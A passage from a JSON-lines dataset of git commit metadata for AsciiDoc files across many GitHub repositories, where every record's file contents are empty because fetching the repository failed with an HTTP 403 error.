2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-D.adoc","new_file":"2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf2923bb6c161b1c9ca4afc1af8fc77a8814acc1","subject":"Delete the file at '_posts\/2017-03-14-First-Post.adoc'","message":"Delete the file at '_posts\/2017-03-14-First-Post.adoc'","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"921b64bc5b90b01f0faf9eb6fc8bc48131ab03e0","subject":"Add doc","message":"Add doc\n","repos":"microserviceux\/muon-node,microserviceux\/muon-node","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/muon-node.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2beab2d8d320805c0eb167fd5d7cb331f96f0af","subject":"Update 
2015-10-14-Un-troisieme-post.adoc","message":"Update 2015-10-14-Un-troisieme-post.adoc","repos":"codelab-lbernard\/blog,codelab-lbernard\/blog,codelab-lbernard\/blog","old_file":"_posts\/2015-10-14-Un-troisieme-post.adoc","new_file":"_posts\/2015-10-14-Un-troisieme-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codelab-lbernard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70521ece4145a4235e2b0c77d3327b73bf6d8854","subject":"Update 2017-09-22-Post-Number-Three.adoc","message":"Update 2017-09-22-Post-Number-Three.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-22-Post-Number-Three.adoc","new_file":"_posts\/2017-09-22-Post-Number-Three.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbe02ab41db99b4a10da57e64d332822cee85a8a","subject":"Publish 10022015-Blog-Title.adoc","message":"Publish 10022015-Blog-Title.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"10022015-Blog-Title.adoc","new_file":"10022015-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3db302e064a66a08adab8e36fe26c00738ed1300","subject":"Update 2016-01-26-Core-Java-Reading.adoc","message":"Update 2016-01-26-Core-Java-Reading.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_file":"_posts\/2016-01-26-Core-Java-Reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f2775c7d35350a5d9f69049392e76eac2d421b","subject":"Update 2017-05-04-Netz-und-Netzwerk.adoc","message":"Update 2017-05-04-Netz-und-Netzwerk.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fbd8391c4204d208e49bef85d753e1624094dcc","subject":"y2b create post Amazon Kindle Fire HD Giveaway!","message":"y2b create post Amazon Kindle Fire HD Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-19-Amazon-Kindle-Fire-HD-Giveaway.adoc","new_file":"_posts\/2012-09-19-Amazon-Kindle-Fire-HD-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"ae636bf5405049c04b4901dc77983603647cbb5d","subject":"DBZ-993 Adjusting to changed log message format","message":"DBZ-993 Adjusting to changed log message format\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/connectors\/sqlserver.asciidoc","new_file":"docs\/connectors\/sqlserver.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf4c6a0718f62e118ec598e27bb04f39f6e1a407","subject":"Create payment.adoc","message":"Create payment.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/subscription\/includes\/payment.adoc","new_file":"userguide\/subscription\/includes\/payment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3136e0f13f372d0f2c3a0e0e8f99a27be0d6e4e2","subject":"y2b create post 3 Cool Gadgets Under $20","message":"y2b create post 3 Cool Gadgets Under $20","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-13-3-Cool-Gadgets-Under-20.adoc","new_file":"_posts\/2017-05-13-3-Cool-Gadgets-Under-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a5ea9dd3b937fa59b5b1d284551e7529f92815","subject":"Update 2017-07-05-Blogging-with-Hub-Press.adoc","message":"Update 2017-07-05-Blogging-with-Hub-Press.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-05-Blogging-with-Hub-Press.adoc","new_file":"_posts\/2017-07-05-Blogging-with-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4632631e004fd51fb4523ace88c3e58c8a090588","subject":"Update 2018-06-06-I-tried-to-use-J-S-Doc3.adoc","message":"Update 2018-06-06-I-tried-to-use-J-S-Doc3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-06-I-tried-to-use-J-S-Doc3.adoc","new_file":"_posts\/2018-06-06-I-tried-to-use-J-S-Doc3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8b6428654433c61cefe6c792f6df66b87f8c02d","subject":"Initial documentation commit","message":"Initial documentation commit\n","repos":"storozhukBM\/requestlimit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/storozhukBM\/requestlimit.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e118163988aecc511b93108f5999c6a9c3d539f4","subject":"Update 2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","message":"Update 2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","new_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-Switch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"error: RPC failed; HTTP 403 curl 22 The requested URL returned error: 403\nfatal: the remote end hung up unexpectedly\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ede8dbc74bb8f863bb47b918bc69f700f8137d","subject":"essai avec asciidoc","message":"essai avec asciidoc\n","repos":"SambaEdu\/se3-docs","old_file":"essai.adoc","new_file":"essai.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SambaEdu\/se3-docs.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"841a48e88333462721771f2b97667d9446ac401b","subject":"test asciidoc","message":"test asciidoc\n","repos":"davidmoten\/rxjava2-jdbc,davidmoten\/rxjava2-jdbc,davidmoten\/rxjava2-jdbc","old_file":"TEST.adoc","new_file":"TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidmoten\/rxjava2-jdbc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"030f1e3fa7dc6054f9dfe1ba153755318837f7f1","subject":"Revert \"unpublish story\"","message":"Revert \"unpublish story\"\n\nThis reverts commit b0a14c52e79fee28c1d6ca8af58f1144645ae222.\n","repos":"clojure\/clojure-site","old_file":"content\/stories\/uhn.adoc","new_file":"content\/stories\/uhn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"539f4ff5b452fb8d866322eb5d742346b4b8cfe5","subject":"Update 2013-11-03-Por-que-Ruby.adoc","message":"Update 2013-11-03-Por-que-Ruby.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2013-11-03-Por-que-Ruby.adoc","new_file":"_posts\/2013-11-03-Por-que-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ef36058dab2f9b26cc4639e43d1352b894a2bbe","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3a7691bd44ce9020456035433145cf6231f73c0","subject":"y2b create post Why SCUF?","message":"y2b create post Why 
SCUF?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-01-13-Why-SCUF.adoc","new_file":"_posts\/2015-01-13-Why-SCUF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfe41968474997c48abb37cd519d476466264f37","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9cd60ce383ce124a8b87944b3e688889dc8b0e3","subject":"Added nng_sockaddr man page.","message":"Added nng_sockaddr man page.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/man\/nng_sockaddr.adoc","new_file":"docs\/man\/nng_sockaddr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86ac38a1b083811538eb47e9ec291f8ca72ce644","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8daf558c0826b76e88323faf261ffa2223faff08","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09466ef24a8e51b25625213f54e5b68f71e67867","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00fd9bdf44727e78d3e9190dfb589e5547bd5baa","subject":"Update dbm-gorm-diff.adoc","message":"Update 
dbm-gorm-diff.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Diff Scripts\/dbm-gorm-diff.adoc","new_file":"src\/docs\/asciidoc\/ref\/Diff Scripts\/dbm-gorm-diff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3250735ae789f47ea43608dc02d70ef2683b227","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a11b480c65b13f42ad27b8a10f75083acec6e365","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2164435926df40ca1918a49c656325967611873","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b3b42ed9a9a971a238011fc9b5c03f5dd7086521","subject":"y2b create post It's Your Life... Or Is It?","message":"y2b create post It's Your Life... 
Or Is It?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-12-Its-Your-Life-Or-Is-It.adoc","new_file":"_posts\/2017-01-12-Its-Your-Life-Or-Is-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7fea8fe0b7f6780db393ec92cae4197d84be7a","subject":"CL lib: HTTP client lib","message":"CL lib: HTTP client lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"61074191b6e7632c2680016266b2f00ddc5b9fc7","subject":"Update 2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","message":"Update 2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","new_file":"_posts\/2017-11-29-Pour-tous-ceux-preparent-un-sujet-pour-le-CFP-de-Devoxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ebfef7baf8826d0528da9463fa09d315aea3e81","subject":"Update 2017-10-02-iterator.adoc","message":"Update 2017-10-02-iterator.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-02-iterator.adoc","new_file":"_posts\/2017-10-02-iterator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d134e5696c0117fa5fab30683b867acbdf65200f","subject":"Hugo Static Site Generator v0.25","message":"Hugo Static Site Generator v0.25\n","repos":"deild\/reipi,deild\/reipi","old_file":"content\/pattern.asciidoc","new_file":"content\/pattern.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deild\/reipi.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe34c18cee09a81b6306d431e0002173d731a893","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc0f7f4108317febd98275d87f23d32142e32e37","subject":"y2b create post Modern Warfare 3 Xbox 360 Console Unboxing (Limited 
Edition)","message":"y2b create post Modern Warfare 3 Xbox 360 Console Unboxing (Limited Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-08-Modern-Warfare-3-Xbox-360-Console-Unboxing-Limited-Edition.adoc","new_file":"_posts\/2011-11-08-Modern-Warfare-3-Xbox-360-Console-Unboxing-Limited-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"060372eb13c3e5a171434a0eefabe20c42e0cef4","subject":"Create 200-mathematical-remarks.asciidoc","message":"Create 200-mathematical-remarks.asciidoc","repos":"tensorics\/tensorics-core","old_file":"src\/asciidoc\/200-mathematical-remarks.asciidoc","new_file":"src\/asciidoc\/200-mathematical-remarks.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c072f4326ed1231b61c65e812ed7302495121bad","subject":"Update 2015-11-06-Nibble-game-source-code-released.adoc","message":"Update 2015-11-06-Nibble-game-source-code-released.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-11-06-Nibble-game-source-code-released.adoc","new_file":"_posts\/2015-11-06-Nibble-game-source-code-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad794ea7bdf35f36a6ccb4322493e83e90b9a923","subject":"Update 2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","message":"Update 2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","new_file":"_posts\/2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06e516144b0a7808b1ed08bec80f439907770d6b","subject":"Update 2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","message":"Update 2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","new_file":"_posts\/2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4df218104f9b94604502f6a01a0365fb09dfa873","subject":"Update 
Sec510_Dev_Policy_howtowork.adoc","message":"Update Sec510_Dev_Policy_howtowork.adoc\n\n git pull\u306e\u8a18\u8ff0\u304c\u629c\u3051\u3066\u3044\u305f\u306e\u306e\u3067\u4fee\u6b63","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5c3d5426313a1de10ae52fd360f4e7455ff4b4f","subject":"added doc","message":"added doc\n","repos":"camunda\/camunda-consulting,camunda\/camunda-consulting,camunda\/camunda-consulting,camunda\/camunda-consulting","old_file":"one-time-examples\/camunda-run-delegates-lib\/README.adoc","new_file":"one-time-examples\/camunda-run-delegates-lib\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-consulting.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f176dcddd6fdeec2ae48700bdf7da25ccc91f4c9","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-c-client,Yubico\/yubico-c-client,kellyjf\/yubi,Yubico\/yubico-c-client,kellyjf\/yubi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-c-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"aa4a73a0ed3f94755eff9845ab96c231f36b6c4f","subject":"Fix commenting out the codecov badge","message":"Fix commenting out the codecov badge","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ab0509ca0e82afe7c4c411cf67810f1faa45296","subject":"feat(doc): add README","message":"feat(doc): add README\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cca9e10f831d806541145771849a4d91123df01","subject":"add lbaas option to packstack invocation","message":"add lbaas option to packstack invocation\n","repos":"markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d265a599117dcbd7b0fb3a15a04c9361750162c9","subject":"doc: initial checkin","message":"doc: initial 
checkin\n","repos":"jhinrichsen\/sense-hat-matrix","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhinrichsen\/sense-hat-matrix.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8972ac754788d3ef10a57a36016d6c3e85ba20d","subject":"Add README.adoc for Github","message":"Add README.adoc for Github\n","repos":"mpx\/lua-cjson,mpx\/lua-cjson,cloudwu\/lua-cjson,cloudwu\/lua-cjson,mah0x211\/lua-cjson,cloudwu\/lua-cjson,mah0x211\/lua-cjson,mpx\/lua-cjson,mah0x211\/lua-cjson","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloudwu\/lua-cjson.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f18bd7fb26e37b9cdd21bca0b1130e98d03292a","subject":"Update 2016-6-28-PHPER-authority-control.adoc","message":"Update 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 